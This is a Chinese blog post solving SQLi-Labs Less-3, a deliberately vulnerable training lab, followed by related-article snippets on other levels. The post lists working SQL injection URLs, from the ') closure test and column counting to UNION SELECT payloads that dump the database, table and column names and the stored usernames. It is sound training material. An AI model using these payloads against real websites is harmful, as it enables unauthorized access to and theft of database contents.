【SQLI-Lab】-Less3

最新推荐文章于 2024-06-06 16:56:16 发布
最新推荐文章于 2024-06-06 16:56:16 发布
阅读量231 收藏 1
点赞数
分类专栏: sqli 漏洞注入通关宝典 文章标签: 渗透测试 mysql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xinyue9966/article/details/113003479
版权
本文介绍了GET单引号变形字符型注入(Errorbased-Singlequoteswithtwiststring)的概念,详细阐述了利用错误回显进行类型判断、闭合字符探索、数据库信息获取等步骤,包括判断列数、爆库名、表名、列名及数据值的过程,强调了字符型注入中符号闭合的重要性。
摘要由CSDN通过智能技术生成

Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

前言

一、GET字符型注入

执行数据库查询,并在回显点展示。
用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。

二、步骤

通过报错判断类型和闭合

http://192.168.135.149/sqli/Less-3/?id=1'

在这里插入图片描述

查看为字符型,进一步查看回显

http://192.168.135.149/sqli/Less-3/?id=1') and 1=1 -- 1

在这里插入图片描述

发现存在注入点

http://192.168.135.149/sqli/Less-3/?id=1') and 1=2 -- 1

在这里插入图片描述

判断列数

http://192.168.135.149/sqli/Less-3/?id=1') group by 3 -- 1

爆库名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,database(),3 -- 1

在这里插入图片描述

爆表名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 -- 1

在这里插入图片描述

爆列名payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),3 --+

在这里插入图片描述

爆username列的数据值payload

http://192.168.135.149/sqli/Less-3/?id=-1') union select 1,(select group_concat(`username`) from security.users),3 -- 1

在这里插入图片描述

总结

字符型注意符号闭合,故意报错看是否多字符,即可明确字符型,符号闭合种类大致有’,’’,),’’),"),’’),"")等,多尝试即可成功

幸运之河
关注
专栏目录
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2393
sqli第三关简要步骤
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1965
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs less-3
dust_hk的博客
01-22 929
解题笔记 今天开始练习手工注入,拿sqli labs做靶机 less1,less2很轻松的就可以通过,在做到less3的时候遇到点瓶颈 首先,判断sql注入类型为字符型 输入 and 1=1 和and 1=2 回显页面相同,所以排除整形注入。 输入 ’ and 1=1 – + 和 ’ and 1=2 --+报同样的错,尝试双引号闭合。 双引号闭合后1=1 和1=2 均回显正常页面。所以...
Sqli-Labs之less-3
ISNS的博客
02-05 1106
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli-lab教程Less-1
Brucye
03-22 435
学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security'(此处拿security库为例) 查字段:select column_name from information_schema.columns where table_name='users'(此处拿users表
sqli-lab 闯关教程 Less-3
羽路星尘的博客
10-29 306
每天一个注入小实验,过程仅供参考,如有建议或指正欢迎留言,对本文风格的建议也可以留在评论区哟。
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1484
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1282
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
Sqli-labs靶场第19关详解[Sqli-labs-less-19]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 774
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。
Sqli-labs靶场第21、22关详解[Sqli-labs-less-21、22]自动化注入-SQLmap工具注入|sqlmap跑base64加密
m0_73615178的博客
03-03 1108
由于21/22雷同,都是需要登录后,注入点通过Cookie值进行测试,值base64加密修改注入数据选项:--tamper=base64encode。
SQLi LABS Less-3 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-19 1万+
sqli第三关,sqli-labs less 3,sqlilabs less3
SQL注入之sqlilabs:less-1
Dmajorcanon的博客
02-21 3777
sqlilabs个人练习及解题思路√
sqli less-03
ANYOUZHEN的博客
04-30 845
老规矩,输入id=1 输入id=1’ 查看错误提示 查看源码,猜测可能要在1‘后面加) 查询列表数,发现为3 ?id=1') order by 3--+ch 发现列表为3,接下来就是常规操作了,首先使用联合查询?id=-1') union select 1,2,3--+ 接下来查询数据库名字?id=-1') union select 1,2,database()--+ 然后查询表?id=-1') union select 1,2,group_concat(ta.
sql注入系列之Sqli-labs(less-3)
BetsyMyGirl的博客
12-02 4333
看完还不会Sql注入你来打我
SQLi-LABS的Less3分析
haoahaoahaoahao的博客
01-15 486
可知id=-1不存在,那么select*from 表名 where (‘id=-1')不动,在url输入的命令union select 1,database(),3会启动。’) 那么--+后面的’)就被注释掉了那么简单理解变为select*from 表名 where id=(‘1‘)id=-1') union select 1,database(),3--+id=-1') union select 1,2,3--+id=1 order by 4 --+id=1’)--+正常。id=1’--+显示。
Less-3
weixin_30389003的博客
04-03 101
这次我就不打印出查询语句了,这种东西毕竟要多练习。否则以后实战时,谁给你看他的查询语句。下面开始讲解: 首先我搭建了一个本地环境,是模仿第三关来写的,我们先来看一下。先给出源码吧,源码随手写的,有一点烂,不过不影响。 <?php include("sql-inc.php"); $id = $_GET[ 'id' ]; $sql = "select * from users wh...
sqli-lab 学习记录 less3-less4
qq_43677324的博客
03-19 335
sqli-lab 学习记录 less3-less4 less3: 进入界面 我们先进行判断注入的类型 我们输入 ?id=1 有正常回显 之后我们在输入 ?id=1' 发现出现了: 根据后面的报错我们可以大致的判断此sql语句是这样的: SELECT * FROM users WHERE id=('$id') LIMIT 0,1" 之后呢,我们来验证我们的判断 我们输入 ?id=1') %...
sqli-labs练习之 Less-3
博客地址 www.sec0nd.top
06-13 454
文章目录判断是否存在注入注入方法order by 查列union select回显利用联合查询查库查表查列查字段 为了方便了解注入的语句,与上两关一样,在第三关的代码中添加 echo $sql;//输出构造的sql语句 echo "<br>";//换行符 判断是否存在注入 /?id=1 发现id是用括号和引号包裹着的 (‘1’) 注入方法 /?id=1') --+ 剩下的与less1,less2操作一致 order by 查列 ?id=1') order by 4 --+ union
SQLI-Labs:Less - 1(UNION 联合注入)
最新发布
weixin_43320796的博客
06-06 465
联合注入(Union Injection)是一种SQL注入攻击技术,它通过在原有的SQL语句中添加UNION操作,将恶意构造的SQL语句与应用程序的SQL语句进行联合,从而对数据库 进行非法操作。这种攻击方式允许攻击者获取敏感数据,或者修改、删除、插入数据。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值